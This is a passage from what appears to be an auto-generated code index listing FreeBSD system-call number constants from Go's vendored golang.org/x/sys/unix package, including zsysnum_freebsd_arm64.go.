SYS_EXTATTR_LIST_FILE = 438 constant SYS_EXTATTR_LIST_LINK (line 273) | SYS_EXTATTR_LIST_LINK = 439 constant SYS_KSEM_TIMEDWAIT (line 274) | SYS_KSEM_TIMEDWAIT = 441 constant SYS_THR_SUSPEND (line 275) | SYS_THR_SUSPEND = 442 constant SYS_THR_WAKE (line 276) | SYS_THR_WAKE = 443 constant SYS_KLDUNLOADF (line 277) | SYS_KLDUNLOADF = 444 constant SYS_AUDIT (line 278) | SYS_AUDIT = 445 constant SYS_AUDITON (line 279) | SYS_AUDITON = 446 constant SYS_GETAUID (line 280) | SYS_GETAUID = 447 constant SYS_SETAUID (line 281) | SYS_SETAUID = 448 constant SYS_GETAUDIT (line 282) | SYS_GETAUDIT = 449 constant SYS_SETAUDIT (line 283) | SYS_SETAUDIT = 450 constant SYS_GETAUDIT_ADDR (line 284) | SYS_GETAUDIT_ADDR = 451 constant SYS_SETAUDIT_ADDR (line 285) | SYS_SETAUDIT_ADDR = 452 constant SYS_AUDITCTL (line 286) | SYS_AUDITCTL = 453 constant SYS__UMTX_OP (line 287) | SYS__UMTX_OP = 454 constant SYS_THR_NEW (line 288) | SYS_THR_NEW = 455 constant SYS_SIGQUEUE (line 289) | SYS_SIGQUEUE = 456 constant SYS_KMQ_OPEN (line 290) | SYS_KMQ_OPEN = 457 constant SYS_KMQ_SETATTR (line 291) | SYS_KMQ_SETATTR = 458 constant SYS_KMQ_TIMEDRECEIVE (line 292) | SYS_KMQ_TIMEDRECEIVE = 459 constant SYS_KMQ_TIMEDSEND (line 293) | SYS_KMQ_TIMEDSEND = 460 constant SYS_KMQ_NOTIFY (line 294) | SYS_KMQ_NOTIFY = 461 constant SYS_KMQ_UNLINK (line 295) | SYS_KMQ_UNLINK = 462 constant SYS_ABORT2 (line 296) | SYS_ABORT2 = 463 constant SYS_THR_SET_NAME (line 297) | SYS_THR_SET_NAME = 464 constant SYS_AIO_FSYNC (line 298) | SYS_AIO_FSYNC = 465 constant SYS_RTPRIO_THREAD (line 299) | SYS_RTPRIO_THREAD = 466 constant SYS_SCTP_PEELOFF (line 300) | SYS_SCTP_PEELOFF = 471 constant SYS_SCTP_GENERIC_SENDMSG (line 301) | SYS_SCTP_GENERIC_SENDMSG = 472 constant SYS_SCTP_GENERIC_SENDMSG_IOV (line 302) | SYS_SCTP_GENERIC_SENDMSG_IOV = 473 constant SYS_SCTP_GENERIC_RECVMSG (line 303) | SYS_SCTP_GENERIC_RECVMSG = 474 constant SYS_PREAD (line 304) | SYS_PREAD = 475 constant SYS_PWRITE (line 305) | SYS_PWRITE = 476 constant SYS_MMAP (line 306) | SYS_MMAP = 477 constant SYS_LSEEK (line 307) | SYS_LSEEK = 478 constant SYS_TRUNCATE (line 308) | SYS_TRUNCATE = 479 constant SYS_FTRUNCATE (line 309) | SYS_FTRUNCATE = 480 constant SYS_THR_KILL2 (line 310) | SYS_THR_KILL2 = 481 constant SYS_SHM_OPEN (line 311) | SYS_SHM_OPEN = 482 constant SYS_SHM_UNLINK (line 312) | SYS_SHM_UNLINK = 483 constant SYS_CPUSET (line 313) | SYS_CPUSET = 484 constant SYS_CPUSET_SETID (line 314) | SYS_CPUSET_SETID = 485 constant SYS_CPUSET_GETID (line 315) | SYS_CPUSET_GETID = 486 constant SYS_CPUSET_GETAFFINITY (line 316) | SYS_CPUSET_GETAFFINITY = 487 constant SYS_CPUSET_SETAFFINITY (line 317) | SYS_CPUSET_SETAFFINITY = 488 constant SYS_FACCESSAT (line 318) | SYS_FACCESSAT = 489 constant SYS_FCHMODAT (line 319) | SYS_FCHMODAT = 490 constant SYS_FCHOWNAT (line 320) | SYS_FCHOWNAT = 491 constant SYS_FEXECVE (line 321) | SYS_FEXECVE = 492 constant SYS_FUTIMESAT (line 322) | SYS_FUTIMESAT = 494 constant SYS_LINKAT (line 323) | SYS_LINKAT = 495 constant SYS_MKDIRAT (line 324) | SYS_MKDIRAT = 496 constant SYS_MKFIFOAT (line 325) | SYS_MKFIFOAT = 497 constant SYS_OPENAT (line 326) | SYS_OPENAT = 499 constant SYS_READLINKAT (line 327) | SYS_READLINKAT = 500 constant SYS_RENAMEAT (line 328) | SYS_RENAMEAT = 501 constant SYS_SYMLINKAT (line 329) | SYS_SYMLINKAT = 502 constant SYS_UNLINKAT (line 330) | SYS_UNLINKAT = 503 constant SYS_POSIX_OPENPT (line 331) | SYS_POSIX_OPENPT = 504 constant SYS_GSSD_SYSCALL (line 332) | SYS_GSSD_SYSCALL = 505 constant SYS_JAIL_GET (line 333) | SYS_JAIL_GET = 506 constant SYS_JAIL_SET (line 334) | SYS_JAIL_SET = 507 constant SYS_JAIL_REMOVE (line 335) | SYS_JAIL_REMOVE = 508 constant SYS_CLOSEFROM (line 336) | SYS_CLOSEFROM = 509 constant SYS___SEMCTL (line 337) | SYS___SEMCTL = 510 constant SYS_MSGCTL (line 338) | SYS_MSGCTL = 511 constant SYS_SHMCTL (line 339) | SYS_SHMCTL = 512 constant SYS_LPATHCONF (line 340) | SYS_LPATHCONF = 513 constant SYS___CAP_RIGHTS_GET (line 341) | SYS___CAP_RIGHTS_GET = 515 constant SYS_CAP_ENTER (line 342) | SYS_CAP_ENTER = 516 constant SYS_CAP_GETMODE (line 343) | SYS_CAP_GETMODE = 517 constant SYS_PDFORK (line 344) | SYS_PDFORK = 518 constant SYS_PDKILL (line 345) | SYS_PDKILL = 519 constant SYS_PDGETPID (line 346) | SYS_PDGETPID = 520 constant SYS_PSELECT (line 347) | SYS_PSELECT = 522 constant SYS_GETLOGINCLASS (line 348) | SYS_GETLOGINCLASS = 523 constant SYS_SETLOGINCLASS (line 349) | SYS_SETLOGINCLASS = 524 constant SYS_RCTL_GET_RACCT (line 350) | SYS_RCTL_GET_RACCT = 525 constant SYS_RCTL_GET_RULES (line 351) | SYS_RCTL_GET_RULES = 526 constant SYS_RCTL_GET_LIMITS (line 352) | SYS_RCTL_GET_LIMITS = 527 constant SYS_RCTL_ADD_RULE (line 353) | SYS_RCTL_ADD_RULE = 528 constant SYS_RCTL_REMOVE_RULE (line 354) | SYS_RCTL_REMOVE_RULE = 529 constant SYS_POSIX_FALLOCATE (line 355) | SYS_POSIX_FALLOCATE = 530 constant SYS_POSIX_FADVISE (line 356) | SYS_POSIX_FADVISE = 531 constant SYS_WAIT6 (line 357) | SYS_WAIT6 = 532 constant SYS_CAP_RIGHTS_LIMIT (line 358) | SYS_CAP_RIGHTS_LIMIT = 533 constant SYS_CAP_IOCTLS_LIMIT (line 359) | SYS_CAP_IOCTLS_LIMIT = 534 constant SYS_CAP_IOCTLS_GET (line 360) | SYS_CAP_IOCTLS_GET = 535 constant SYS_CAP_FCNTLS_LIMIT (line 361) | SYS_CAP_FCNTLS_LIMIT = 536 constant SYS_CAP_FCNTLS_GET (line 362) | SYS_CAP_FCNTLS_GET = 537 constant SYS_BINDAT (line 363) | SYS_BINDAT = 538 constant SYS_CONNECTAT (line 364) | SYS_CONNECTAT = 539 constant SYS_CHFLAGSAT (line 365) | SYS_CHFLAGSAT = 540 constant SYS_ACCEPT4 (line 366) | SYS_ACCEPT4 = 541 constant SYS_PIPE2 (line 367) | SYS_PIPE2 = 542 constant SYS_AIO_MLOCK (line 368) | SYS_AIO_MLOCK = 543 constant SYS_PROCCTL (line 369) | SYS_PROCCTL = 544 constant SYS_PPOLL (line 370) | SYS_PPOLL = 545 constant SYS_FUTIMENS (line 371) | SYS_FUTIMENS = 546 constant SYS_UTIMENSAT (line 372) | SYS_UTIMENSAT = 547 constant SYS_FDATASYNC (line 373) | SYS_FDATASYNC = 550 constant SYS_FSTAT (line 374) | SYS_FSTAT = 551 constant SYS_FSTATAT (line 375) | SYS_FSTATAT = 552 constant SYS_FHSTAT (line 376) | SYS_FHSTAT = 553 constant SYS_GETDIRENTRIES (line 377) | SYS_GETDIRENTRIES = 554 constant SYS_STATFS (line 378) | SYS_STATFS = 555 constant SYS_FSTATFS (line 379) | SYS_FSTATFS = 556 constant SYS_GETFSSTAT (line 380) | SYS_GETFSSTAT = 557 constant SYS_FHSTATFS (line 381) | SYS_FHSTATFS = 558 constant SYS_MKNODAT (line 382) | SYS_MKNODAT = 559 constant SYS_KEVENT (line 383) | SYS_KEVENT = 560 constant SYS_CPUSET_GETDOMAIN (line 384) | SYS_CPUSET_GETDOMAIN = 561 constant SYS_CPUSET_SETDOMAIN (line 385) | SYS_CPUSET_SETDOMAIN = 562 constant SYS_GETRANDOM (line 386) | SYS_GETRANDOM = 563 constant SYS_GETFHAT (line 387) | SYS_GETFHAT = 564 constant SYS_FHLINK (line 388) | SYS_FHLINK = 565 constant SYS_FHLINKAT (line 389) | SYS_FHLINKAT = 566 constant SYS_FHREADLINK (line 390) | SYS_FHREADLINK = 567 constant SYS___SYSCTLBYNAME (line 391) | SYS___SYSCTLBYNAME = 570 constant SYS_CLOSE_RANGE (line 392) | SYS_CLOSE_RANGE = 575 FILE: vendor/golang.org/x/sys/unix/zsysnum_freebsd_arm64.go constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_WAIT4 (line 16) | SYS_WAIT4 = 7 constant SYS_LINK (line 17) | SYS_LINK = 9 constant SYS_UNLINK (line 18) | SYS_UNLINK = 10 constant SYS_CHDIR (line 19) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 20) | SYS_FCHDIR = 13 constant SYS_CHMOD (line 21) | SYS_CHMOD = 15 constant SYS_CHOWN (line 22) | SYS_CHOWN = 16 constant SYS_BREAK (line 23) | SYS_BREAK = 17 constant SYS_GETPID (line 24) | SYS_GETPID = 20 constant SYS_MOUNT (line 25) | SYS_MOUNT = 21 constant SYS_UNMOUNT (line 26) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 27) | SYS_SETUID = 23 constant SYS_GETUID (line 28) | SYS_GETUID = 24 constant SYS_GETEUID (line 29) | SYS_GETEUID = 25 constant SYS_PTRACE (line 30) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 31) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 32) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 33) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 34) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 35) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 36) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 37) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 38) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 39) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 40) | SYS_SYNC = 36 constant SYS_KILL (line 41) | SYS_KILL = 37 constant SYS_GETPPID (line 42) | SYS_GETPPID = 39 constant SYS_DUP (line 43) | SYS_DUP = 41 constant SYS_GETEGID (line 44) | SYS_GETEGID = 43 constant SYS_PROFIL (line 45) | SYS_PROFIL = 44 constant SYS_KTRACE (line 46) | SYS_KTRACE = 45 constant SYS_GETGID (line 47) | SYS_GETGID = 47 constant SYS_GETLOGIN (line 48) | SYS_GETLOGIN = 49 constant SYS_SETLOGIN (line 49) | SYS_SETLOGIN = 50 constant SYS_ACCT (line 50) | SYS_ACCT = 51 constant SYS_SIGALTSTACK (line 51) | SYS_SIGALTSTACK = 53 constant SYS_IOCTL (line 52) | SYS_IOCTL = 54 constant SYS_REBOOT (line 53) | SYS_REBOOT = 55 constant SYS_REVOKE (line 54) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 55) | SYS_SYMLINK = 57 constant SYS_READLINK (line 56) | SYS_READLINK = 58 constant SYS_EXECVE (line 57) | SYS_EXECVE = 59 constant SYS_UMASK (line 58) | SYS_UMASK = 60 constant SYS_CHROOT (line 59) | SYS_CHROOT = 61 constant SYS_MSYNC (line 60) | SYS_MSYNC = 65 constant SYS_VFORK (line 61) | SYS_VFORK = 66 constant SYS_SBRK (line 62) | SYS_SBRK = 69 constant SYS_SSTK (line 63) | SYS_SSTK = 70 constant SYS_MUNMAP (line 64) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 65) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 66) | SYS_MADVISE = 75 constant SYS_MINCORE (line 67) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 68) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 69) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 70) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 71) | SYS_SETPGID = 82 constant SYS_SETITIMER (line 72) | SYS_SETITIMER = 83 constant SYS_SWAPON (line 73) | SYS_SWAPON = 85 constant SYS_GETITIMER (line 74) | SYS_GETITIMER = 86 constant SYS_GETDTABLESIZE (line 75) | SYS_GETDTABLESIZE = 89 constant SYS_DUP2 (line 76) | SYS_DUP2 = 90 constant SYS_FCNTL (line 77) | SYS_FCNTL = 92 constant SYS_SELECT (line 78) | SYS_SELECT = 93 constant SYS_FSYNC (line 79) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 80) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 81) | SYS_SOCKET = 97 constant SYS_CONNECT (line 82) | SYS_CONNECT = 98 constant SYS_GETPRIORITY (line 83) | SYS_GETPRIORITY = 100 constant SYS_BIND (line 84) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 85) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 86) | SYS_LISTEN = 106 constant SYS_GETTIMEOFDAY (line 87) | SYS_GETTIMEOFDAY = 116 constant SYS_GETRUSAGE (line 88) | SYS_GETRUSAGE = 117 constant SYS_GETSOCKOPT (line 89) | SYS_GETSOCKOPT = 118 constant SYS_READV (line 90) | SYS_READV = 120 constant SYS_WRITEV (line 91) | SYS_WRITEV = 121 constant SYS_SETTIMEOFDAY (line 92) | SYS_SETTIMEOFDAY = 122 constant SYS_FCHOWN (line 93) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 94) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 95) | SYS_SETREUID = 126 constant SYS_SETREGID (line 96) | SYS_SETREGID = 127 constant SYS_RENAME (line 97) | SYS_RENAME = 128 constant SYS_FLOCK (line 98) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 99) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 100) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 101) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 102) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 103) | SYS_MKDIR = 136 constant SYS_RMDIR (line 104) | SYS_RMDIR = 137 constant SYS_UTIMES (line 105) | SYS_UTIMES = 138 constant SYS_ADJTIME (line 106) | SYS_ADJTIME = 140 constant SYS_SETSID (line 107) | SYS_SETSID = 147 constant SYS_QUOTACTL (line 108) | SYS_QUOTACTL = 148 constant SYS_NLM_SYSCALL (line 109) | SYS_NLM_SYSCALL = 154 constant SYS_NFSSVC (line 110) | SYS_NFSSVC = 155 constant SYS_LGETFH (line 111) | SYS_LGETFH = 160 constant SYS_GETFH (line 112) | SYS_GETFH = 161 constant SYS_SYSARCH (line 113) | SYS_SYSARCH = 165 constant SYS_RTPRIO (line 114) | SYS_RTPRIO = 166 constant SYS_SEMSYS (line 115) | SYS_SEMSYS = 169 constant SYS_MSGSYS (line 116) | SYS_MSGSYS = 170 constant SYS_SHMSYS (line 117) | SYS_SHMSYS = 171 constant SYS_SETFIB (line 118) | SYS_SETFIB = 175 constant SYS_NTP_ADJTIME (line 119) | SYS_NTP_ADJTIME = 176 constant SYS_SETGID (line 120) | SYS_SETGID = 181 constant SYS_SETEGID (line 121) | SYS_SETEGID = 182 constant SYS_SETEUID (line 122) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 123) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 124) | SYS_FPATHCONF = 192 constant SYS_GETRLIMIT (line 125) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 126) | SYS_SETRLIMIT = 195 constant SYS___SYSCTL (line 127) | SYS___SYSCTL = 202 constant SYS_MLOCK (line 128) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 129) | SYS_MUNLOCK = 204 constant SYS_UNDELETE (line 130) | SYS_UNDELETE = 205 constant SYS_FUTIMES (line 131) | SYS_FUTIMES = 206 constant SYS_GETPGID (line 132) | SYS_GETPGID = 207 constant SYS_POLL (line 133) | SYS_POLL = 209 constant SYS_SEMGET (line 134) | SYS_SEMGET = 221 constant SYS_SEMOP (line 135) | SYS_SEMOP = 222 constant SYS_MSGGET (line 136) | SYS_MSGGET = 225 constant SYS_MSGSND (line 137) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 138) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 139) | SYS_SHMAT = 228 constant SYS_SHMDT (line 140) | SYS_SHMDT = 230 constant SYS_SHMGET (line 141) | SYS_SHMGET = 231 constant SYS_CLOCK_GETTIME (line 142) | SYS_CLOCK_GETTIME = 232 constant SYS_CLOCK_SETTIME (line 143) | SYS_CLOCK_SETTIME = 233 constant SYS_CLOCK_GETRES (line 144) | SYS_CLOCK_GETRES = 234 constant SYS_KTIMER_CREATE (line 145) | SYS_KTIMER_CREATE = 235 constant SYS_KTIMER_DELETE (line 146) | SYS_KTIMER_DELETE = 236 constant SYS_KTIMER_SETTIME (line 147) | SYS_KTIMER_SETTIME = 237 constant SYS_KTIMER_GETTIME (line 148) | SYS_KTIMER_GETTIME = 238 constant SYS_KTIMER_GETOVERRUN (line 149) | SYS_KTIMER_GETOVERRUN = 239 constant SYS_NANOSLEEP (line 150) | SYS_NANOSLEEP = 240 constant SYS_FFCLOCK_GETCOUNTER (line 151) | SYS_FFCLOCK_GETCOUNTER = 241 constant SYS_FFCLOCK_SETESTIMATE (line 152) | SYS_FFCLOCK_SETESTIMATE = 242 constant SYS_FFCLOCK_GETESTIMATE (line 153) | SYS_FFCLOCK_GETESTIMATE = 243 constant SYS_CLOCK_NANOSLEEP (line 154) | SYS_CLOCK_NANOSLEEP = 244 constant SYS_CLOCK_GETCPUCLOCKID2 (line 155) | SYS_CLOCK_GETCPUCLOCKID2 = 247 constant SYS_NTP_GETTIME (line 156) | SYS_NTP_GETTIME = 248 constant SYS_MINHERIT (line 157) | SYS_MINHERIT = 250 constant SYS_RFORK (line 158) | SYS_RFORK = 251 constant SYS_ISSETUGID (line 159) | SYS_ISSETUGID = 253 constant SYS_LCHOWN (line 160) | SYS_LCHOWN = 254 constant SYS_AIO_READ (line 161) | SYS_AIO_READ = 255 constant SYS_AIO_WRITE (line 162) | SYS_AIO_WRITE = 256 constant SYS_LIO_LISTIO (line 163) | SYS_LIO_LISTIO = 257 constant SYS_LCHMOD (line 164) | SYS_LCHMOD = 274 constant SYS_LUTIMES (line 165) | SYS_LUTIMES = 276 constant SYS_PREADV (line 166) | SYS_PREADV = 289 constant SYS_PWRITEV (line 167) | SYS_PWRITEV = 290 constant SYS_FHOPEN (line 168) | SYS_FHOPEN = 298 constant SYS_MODNEXT (line 169) | SYS_MODNEXT = 300 constant SYS_MODSTAT (line 170) | SYS_MODSTAT = 301 constant SYS_MODFNEXT (line 171) | SYS_MODFNEXT = 302 constant SYS_MODFIND (line 172) | SYS_MODFIND = 303 constant SYS_KLDLOAD (line 173) | SYS_KLDLOAD = 304 constant SYS_KLDUNLOAD (line 174) | SYS_KLDUNLOAD = 305 constant SYS_KLDFIND (line 175) | SYS_KLDFIND = 306 constant SYS_KLDNEXT (line 176) | SYS_KLDNEXT = 307 constant SYS_KLDSTAT (line 177) | SYS_KLDSTAT = 308 constant SYS_KLDFIRSTMOD (line 178) | SYS_KLDFIRSTMOD = 309 constant SYS_GETSID (line 179) | SYS_GETSID = 310 constant SYS_SETRESUID (line 180) | SYS_SETRESUID = 311 constant SYS_SETRESGID (line 181) | SYS_SETRESGID = 312 constant SYS_AIO_RETURN (line 182) | SYS_AIO_RETURN = 314 constant SYS_AIO_SUSPEND (line 183) | SYS_AIO_SUSPEND = 315 constant SYS_AIO_CANCEL (line 184) | SYS_AIO_CANCEL = 316 constant SYS_AIO_ERROR (line 185) | SYS_AIO_ERROR = 317 constant SYS_YIELD (line 186) | SYS_YIELD = 321 constant SYS_MLOCKALL (line 187) | SYS_MLOCKALL = 324 constant SYS_MUNLOCKALL (line 188) | SYS_MUNLOCKALL = 325 constant SYS___GETCWD (line 189) | SYS___GETCWD = 326 constant SYS_SCHED_SETPARAM (line 190) | SYS_SCHED_SETPARAM = 327 constant SYS_SCHED_GETPARAM (line 191) | SYS_SCHED_GETPARAM = 328 constant SYS_SCHED_SETSCHEDULER (line 192) | SYS_SCHED_SETSCHEDULER = 329 constant SYS_SCHED_GETSCHEDULER (line 193) | SYS_SCHED_GETSCHEDULER = 330 constant SYS_SCHED_YIELD (line 194) | SYS_SCHED_YIELD = 331 constant SYS_SCHED_GET_PRIORITY_MAX (line 195) | SYS_SCHED_GET_PRIORITY_MAX = 332 constant SYS_SCHED_GET_PRIORITY_MIN (line 196) | SYS_SCHED_GET_PRIORITY_MIN = 333 constant SYS_SCHED_RR_GET_INTERVAL (line 197) | SYS_SCHED_RR_GET_INTERVAL = 334 constant SYS_UTRACE (line 198) | SYS_UTRACE = 335 constant SYS_KLDSYM (line 199) | SYS_KLDSYM = 337 constant SYS_JAIL (line 200) | SYS_JAIL = 338 constant SYS_SIGPROCMASK (line 201) | SYS_SIGPROCMASK = 340 constant SYS_SIGSUSPEND (line 202) | SYS_SIGSUSPEND = 341 constant SYS_SIGPENDING (line 203) | SYS_SIGPENDING = 343 constant SYS_SIGTIMEDWAIT (line 204) | SYS_SIGTIMEDWAIT = 345 constant SYS_SIGWAITINFO (line 205) | SYS_SIGWAITINFO = 346 constant SYS___ACL_GET_FILE (line 206) | SYS___ACL_GET_FILE = 347 constant SYS___ACL_SET_FILE (line 207) | SYS___ACL_SET_FILE = 348 constant SYS___ACL_GET_FD (line 208) | SYS___ACL_GET_FD = 349 constant SYS___ACL_SET_FD (line 209) | SYS___ACL_SET_FD = 350 constant SYS___ACL_DELETE_FILE (line 210) | SYS___ACL_DELETE_FILE = 351 constant SYS___ACL_DELETE_FD (line 211) | SYS___ACL_DELETE_FD = 352 constant SYS___ACL_ACLCHECK_FILE (line 212) | SYS___ACL_ACLCHECK_FILE = 353 constant SYS___ACL_ACLCHECK_FD (line 213) | SYS___ACL_ACLCHECK_FD = 354 constant SYS_EXTATTRCTL (line 214) | SYS_EXTATTRCTL = 355 constant SYS_EXTATTR_SET_FILE (line 215) | SYS_EXTATTR_SET_FILE = 356 constant SYS_EXTATTR_GET_FILE (line 216) | SYS_EXTATTR_GET_FILE = 357 constant SYS_EXTATTR_DELETE_FILE (line 217) | SYS_EXTATTR_DELETE_FILE = 358 constant SYS_AIO_WAITCOMPLETE (line 218) | SYS_AIO_WAITCOMPLETE = 359 constant SYS_GETRESUID (line 219) | SYS_GETRESUID = 360 constant SYS_GETRESGID (line 220) | SYS_GETRESGID = 361 constant SYS_KQUEUE (line 221) | SYS_KQUEUE = 362 constant SYS_EXTATTR_SET_FD (line 222) | SYS_EXTATTR_SET_FD = 371 constant SYS_EXTATTR_GET_FD (line 223) | SYS_EXTATTR_GET_FD = 372 constant SYS_EXTATTR_DELETE_FD (line 224) | SYS_EXTATTR_DELETE_FD = 373 constant SYS___SETUGID (line 225) | SYS___SETUGID = 374 constant SYS_EACCESS (line 226) | SYS_EACCESS = 376 constant SYS_NMOUNT (line 227) | SYS_NMOUNT = 378 constant SYS___MAC_GET_PROC (line 228) | SYS___MAC_GET_PROC = 384 constant SYS___MAC_SET_PROC (line 229) | SYS___MAC_SET_PROC = 385 constant SYS___MAC_GET_FD (line 230) | SYS___MAC_GET_FD = 386 constant SYS___MAC_GET_FILE (line 231) | SYS___MAC_GET_FILE = 387 constant SYS___MAC_SET_FD (line 232) | SYS___MAC_SET_FD = 388 constant SYS___MAC_SET_FILE (line 233) | SYS___MAC_SET_FILE = 389 constant SYS_KENV (line 234) | SYS_KENV = 390 constant SYS_LCHFLAGS (line 235) | SYS_LCHFLAGS = 391 constant SYS_UUIDGEN (line 236) | SYS_UUIDGEN = 392 constant SYS_SENDFILE (line 237) | SYS_SENDFILE = 393 constant SYS_MAC_SYSCALL (line 238) | SYS_MAC_SYSCALL = 394 constant SYS_KSEM_CLOSE (line 239) | SYS_KSEM_CLOSE = 400 constant SYS_KSEM_POST (line 240) | SYS_KSEM_POST = 401 constant SYS_KSEM_WAIT (line 241) | SYS_KSEM_WAIT = 402 constant SYS_KSEM_TRYWAIT (line 242) | SYS_KSEM_TRYWAIT = 403 constant SYS_KSEM_INIT (line 243) | SYS_KSEM_INIT = 404 constant SYS_KSEM_OPEN (line 244) | SYS_KSEM_OPEN = 405 constant SYS_KSEM_UNLINK (line 245) | SYS_KSEM_UNLINK = 406 constant SYS_KSEM_GETVALUE (line 246) | SYS_KSEM_GETVALUE = 407 constant SYS_KSEM_DESTROY (line 247) | SYS_KSEM_DESTROY = 408 constant SYS___MAC_GET_PID (line 248) | SYS___MAC_GET_PID = 409 constant SYS___MAC_GET_LINK (line 249) | SYS___MAC_GET_LINK = 410 constant SYS___MAC_SET_LINK (line 250) | SYS___MAC_SET_LINK = 411 constant SYS_EXTATTR_SET_LINK (line 251) | SYS_EXTATTR_SET_LINK = 412 constant SYS_EXTATTR_GET_LINK (line 252) | SYS_EXTATTR_GET_LINK = 413 constant SYS_EXTATTR_DELETE_LINK (line 253) | SYS_EXTATTR_DELETE_LINK = 414 constant SYS___MAC_EXECVE (line 254) | SYS___MAC_EXECVE = 415 constant SYS_SIGACTION (line 255) | SYS_SIGACTION = 416 constant SYS_SIGRETURN (line 256) | SYS_SIGRETURN = 417 constant SYS_GETCONTEXT (line 257) | SYS_GETCONTEXT = 421 constant SYS_SETCONTEXT (line 258) | SYS_SETCONTEXT = 422 constant SYS_SWAPCONTEXT (line 259) | SYS_SWAPCONTEXT = 423 constant SYS_SWAPOFF (line 260) | SYS_SWAPOFF = 424 constant SYS___ACL_GET_LINK (line 261) | SYS___ACL_GET_LINK = 425 constant SYS___ACL_SET_LINK (line 262) | SYS___ACL_SET_LINK = 426 constant SYS___ACL_DELETE_LINK (line 263) | SYS___ACL_DELETE_LINK = 427 constant SYS___ACL_ACLCHECK_LINK (line 264) | SYS___ACL_ACLCHECK_LINK = 428 constant SYS_SIGWAIT (line 265) | SYS_SIGWAIT = 429 constant SYS_THR_CREATE (line 266) | SYS_THR_CREATE = 430 constant SYS_THR_EXIT (line 267) | SYS_THR_EXIT = 431 constant SYS_THR_SELF (line 268) | SYS_THR_SELF = 432 constant SYS_THR_KILL (line 269) | SYS_THR_KILL = 433 constant SYS_JAIL_ATTACH (line 270) | SYS_JAIL_ATTACH = 436 constant SYS_EXTATTR_LIST_FD (line 271) | SYS_EXTATTR_LIST_FD = 437 constant SYS_EXTATTR_LIST_FILE (line 272) | SYS_EXTATTR_LIST_FILE = 438 constant SYS_EXTATTR_LIST_LINK (line 273) | SYS_EXTATTR_LIST_LINK = 439 constant SYS_KSEM_TIMEDWAIT (line 274) | SYS_KSEM_TIMEDWAIT = 441 constant SYS_THR_SUSPEND (line 275) | SYS_THR_SUSPEND = 442 constant SYS_THR_WAKE (line 276) | SYS_THR_WAKE = 443 constant SYS_KLDUNLOADF (line 277) | SYS_KLDUNLOADF = 444 constant SYS_AUDIT (line 278) | SYS_AUDIT = 445 constant SYS_AUDITON (line 279) | SYS_AUDITON = 446 constant SYS_GETAUID (line 280) | SYS_GETAUID = 447 constant SYS_SETAUID (line 281) | SYS_SETAUID = 448 constant SYS_GETAUDIT (line 282) | SYS_GETAUDIT = 449 constant SYS_SETAUDIT (line 283) | SYS_SETAUDIT = 450 constant SYS_GETAUDIT_ADDR (line 284) | SYS_GETAUDIT_ADDR = 451 constant SYS_SETAUDIT_ADDR (line 285) | SYS_SETAUDIT_ADDR = 452 constant SYS_AUDITCTL (line 286) | SYS_AUDITCTL = 453 constant SYS__UMTX_OP (line 287) | SYS__UMTX_OP = 454 constant SYS_THR_NEW (line 288) | SYS_THR_NEW = 455 constant SYS_SIGQUEUE (line 289) | SYS_SIGQUEUE = 456 constant SYS_KMQ_OPEN (line 290) | SYS_KMQ_OPEN = 457 constant SYS_KMQ_SETATTR (line 291) | SYS_KMQ_SETATTR = 458 constant SYS_KMQ_TIMEDRECEIVE (line 292) | SYS_KMQ_TIMEDRECEIVE = 459 constant SYS_KMQ_TIMEDSEND (line 293) | SYS_KMQ_TIMEDSEND = 460 constant SYS_KMQ_NOTIFY (line 294) | SYS_KMQ_NOTIFY = 461 constant SYS_KMQ_UNLINK (line 295) | SYS_KMQ_UNLINK = 462 constant SYS_ABORT2 (line 296) | SYS_ABORT2 = 463 constant SYS_THR_SET_NAME (line 297) | SYS_THR_SET_NAME = 464 constant SYS_AIO_FSYNC (line 298) | SYS_AIO_FSYNC = 465 constant SYS_RTPRIO_THREAD (line 299) | SYS_RTPRIO_THREAD = 466 constant SYS_SCTP_PEELOFF (line 300) | SYS_SCTP_PEELOFF = 471 constant SYS_SCTP_GENERIC_SENDMSG (line 301) | SYS_SCTP_GENERIC_SENDMSG = 472 constant SYS_SCTP_GENERIC_SENDMSG_IOV (line 302) | SYS_SCTP_GENERIC_SENDMSG_IOV = 473 constant SYS_SCTP_GENERIC_RECVMSG (line 303) | SYS_SCTP_GENERIC_RECVMSG = 474 constant SYS_PREAD (line 304) | SYS_PREAD = 475 constant 